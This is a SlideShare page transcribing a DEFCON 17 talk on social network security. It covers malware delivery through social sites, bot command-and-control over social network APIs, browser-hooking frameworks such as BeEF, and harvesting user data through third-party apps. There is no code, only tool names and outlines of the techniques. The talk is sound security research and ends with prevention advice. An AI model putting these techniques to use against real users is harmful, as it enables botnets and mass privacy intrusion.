Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Social Zombies: Your Friends Want to Eat Your Brains


Published on

In Social Zombies: Your Friends want to eat Your Brains, Tom Eston and Kevin Johnson explore the various concerns related to malware delivery through social network sites. Ignoring the FUD and confusion being sowed today, this presentation will examine the risks and then present tools that can be used to exploit these issues.

This presentation begins by discussing how social networks work and the various privacy and security concerns that are caused by the trust mass that is social networks. We use this privacy confusion to exploit members and their companies during our penetration tests.

The presentation then discusses typical botnets and bot programs. Both the delivery of this malware through social networks and the use of these social networks as command and control channels will be examined.

Tom and Kevin next explore the use of browser-based bots and their delivery through custom social network applications and content. This research expands upon previous work by researchers such as Wade Alcorn and GNUCitizen and takes it into new C&C directions.

Finally, the information available through the social network APIs is explored using the bot delivery applications. This allows for complete coverage of the targets and their information.

Presentation is from the DEFCON 17 CD not the one we gave live. Full presentation will be posted in a few months after we give the talk a few more times.

Published in: Technology, Education
  • Be the first to comment

Social Zombies: Your Friends Want to Eat Your Brains

  1. 1. SOCIAL ZOMBIES Your Friends Want to Eat Your Brains
  2. 2. STARRING...
  3. 3. TOM ESTON
  5. 5. Social Networks “The New Hotness”
  6. 6. 225 Million Users
  7. 7. 110 Million Users
  8. 8. Grew 752% in 2008!
  9. 9. 8 million visitors in march 2009
  10. 10. “Social networks & Blogs are now the 4th most popular online activity, ahead of personal email.” -Nielsen Online Report, March 2009
  11. 11. How do socnets make $$?
  12. 12. It’s in your Profile! • More information you share...more $ $ it’s worth! • Targeted advertising • Sell your Demographic Info • Sketchy Privacy/ToS Policies....
  13. 13. In Social networks we Trust...
  14. 14. Trust is Everything! • It’s how social networks work • More trust, the better for the socnet! • Attackers LOVE trust relationships!
  15. 15. Fake Profiles
  16. 16. It’s built to Exploit Trust • Who is the person behind the account? • Bots are Everywhere • Accounts are easy to create • Socnet User Verification = FAIL • Connections based on other “friends”
  17. 17. Privacy Concerns
  18. 18. 25 Random Things About You... • I’m your friend, I want to know more about you! • Innocent? • These are PASSWORD RESET QUESTIONS people!!
  19. 19. Corporate Espionage? • Very effective in a Penetration test • Socnet Information = GOLD • Information Leakage on a Mass Scale!
  20. 20. Default Privacy Settings • Wide Open for a reason! • Facebook has very good controls...but... • Do you know where they are? • Do your Friends/Family? • Do They Care?
  21. 21. Security Concerns • Socnets are #1 Target for Malware • Spam • Disinformation • XSS, CSRF and more!
  22. 22. Twitter Clickjacking & XSS
  23. 23. Return of Koobface • Recycled ExploitS • Exploits Trust • STILL EFFECTIVE!
  24. 24. Social Network Bots
  25. 25. Delivery VIA Socnet API • Twitter Bots (n0tab0t, Realboy) • Automated tools and scripts...
  26. 26. Automated Tools
  27. 27. Pay Services
  28. 28. Social Network Botnets?
  29. 29. Facebot POC • Malicious Facebook APplication (looks normal) • Turns your PC into a Bot used for DDOS!
  30. 30. Introducing... Kreios C2
  31. 31. Kreios C2 Demo
  32. 32. Browser Based Bots
  33. 33. Browsers and Features... Oh My! • Browsers are getting more feature-rcih • Read that as more vulnerable! • Forget exploiting vulns • Abuse the features we are provided
  34. 34. Browser Zombies • JavaScript used to hook the browser • Other technologies will work • Many frameworks available • BeEF • BrowserRider • Anehta
  35. 35. SocNet Delivery • Embedded applications can insert JavaScript • Multiple options • Hook scripts are pushed • Userssitesredirected to hook are • Why would we allow this!?!?
  36. 36. Oh Yeah Mafia Wars
  37. 37. Server Side Information Collection
  38. 38. Information is Power • Information gets us access • Social networks are littered with info • By how do we connect it together
  39. 39. Third party apps to the rescue • Third party apps have access to everything • Permissions are open by default • Once a user says accept
  40. 40. API’s FTW • Myspaceto anfacebook both provide access and api • These APIs provide the access we want • Allows connecting different users • Based on friends, groups, jobs or interests
  41. 41. Social Butterfly • Social Butterfly is a third party application • Runs on attacker controlled servers • Collects the data from application users • Crosses the line between different sites • Fine line before violating TOS!
  42. 42. Social Butterfly DEMO
  43. 43. Prevention • User Education • End “opt-In” Socnet Developer Models • Control API Usage • Better Account verification • SPAM Throttling
  44. 44. Conclusions
  45. 45. MoRe Information • Facebook Privacy & Security Guide SPYLOGIC.NET • Kreios C2 • New website dedicated to Social media security (announced at Defcon)
  46. 46. Questions for the Zombies?